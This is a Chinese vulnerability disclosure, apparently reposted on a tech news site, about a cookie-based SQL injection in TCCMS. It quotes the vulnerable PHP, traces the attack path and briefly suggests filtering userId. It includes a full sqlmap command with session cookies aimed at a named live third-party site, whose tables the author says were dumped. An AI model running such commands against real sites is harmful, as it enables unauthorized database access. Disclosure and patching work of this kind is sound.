TCCMS全版本COOKIE注入及修复
TCCMS teamcen.com Cookie Injection
证明处使用SQLMAP注射成功
/public/Class/Authen.class.php
省略无关代码
请注意添加注释处代码,下同
public static function checkUserLogin() { $_Obj = M("user"); if (empty($_COOKIE['userId']) || empty($_COOKIE['AuthenId'])) {return false;} //下面的语句直接使用$_COOKIE['userId']没有过滤 $sql="select password from ".$_Obj->table." where id=".$_COOKIE['userId']; //不考虑之后的代码,如果没有其他限制至少可以盲注 $info = $_Obj->query($sql); if (!empty($_COOKIE['AuthenId']) && md5($info[0][password].Config::get("anthenKey")) == $_COOKIE['AuthenId']) { return true; } return false; }//下面函数与之后提到的攻击向量有关public static function checkIsSelfData($uid) { if (self::isAdmin()) {return true;} if ($uid == $_COOKIE['userId'] && self::checkUserLogin()) {return true;} return false; }
那么我们要定位漏洞代码的触发位置
/core/controller/user.class.php
攻击向量:
update()-------------》Authen::checkIsSelfData-------》checkUserLogin()
缺陷参数:userID
public function update() {
…………省略无关代码…………
//禁止修改别人的$IsSelfData = Authen::checkIsSelfData($_Obj->id);if (!$IsSelfData) {$this->setValue("error", Config::lang("NOTRIGHT"));$this->forward("error.html");exit;}$_Obj->update();StringUtil::msgbox(Config::lang("MODIFYSUCCESS"), 'index.php?ac=user_info', 1);}
即:在更新个人信息时可以直接将cookie中的userID带入数据库查询,形成注射
下面是利用SQLMAP的证明
漏洞证明:
演示的站点为 lszq.xinwen110.cn
理事会员-中国社会新闻网理事会员-中国社会新闻网 - Power By TCCMS
本机测试时的命令
C:/Users/Administrator.PC-20110802HBAF>sqlmap.py -u "lszq.xinwen110.cn/index.php
?ac=user_update" --data "abc" --cookie "Cookie=PHPSESSID=0lc04nmbqmmtr420c83n8ov
3g4; userId=37; AuthenId=2fd1239168e9fabd621a8d00fba03203" --level 2 --table --d
bms=mysql
跑了下数据库,证明即可
注意,请在复现漏洞时将COOKIE换为对应的有效COOKIE(可以注册一个)
修复方案:
checkUserLogin() 严格过滤userID
>更多相关文章
- 11-15不看后悔!程序员防御XSS的无奈
- 11-10揭秘Web黑客3种注入点判断方法
- 11-10黑客Web脚本注入攻击深度剖析
- 10-21全球无线网络面临黑客攻击风险 WiFi曝安全漏洞
- 02-24iPhone再爆安全漏洞 黑客1分钟可盗照片及加密信息
- 02-22互联网金融风险 警示网站漏洞或成“致命点”
首页推荐
佛山市东联科技有限公司一直秉承“一切以用户价值为依归
- 01-11全球最受赞誉公司揭晓:苹果连续九年第一
- 12-09罗伯特·莫里斯:让黑客真正变黑
- 12-09谁闯入了中国网络?揭秘美国绝密黑客小组TA
- 12-09警示:iOS6 惊现“闪退”BUG
- 04-21中国产品数字护照体系加速建设
- 04-21上海口岸汽车出口突破50万辆
- 04-21外媒:微软囤货GPU以发展AI
- 04-21苹果手表MicroLED项目停滞持续波及供应链
- 04-21三部门:到2024年末IPv6活跃用户数达到8亿
相关文章
24小时热门资讯
24小时回复排行
热门推荐
最新资讯
操作系统
黑客防御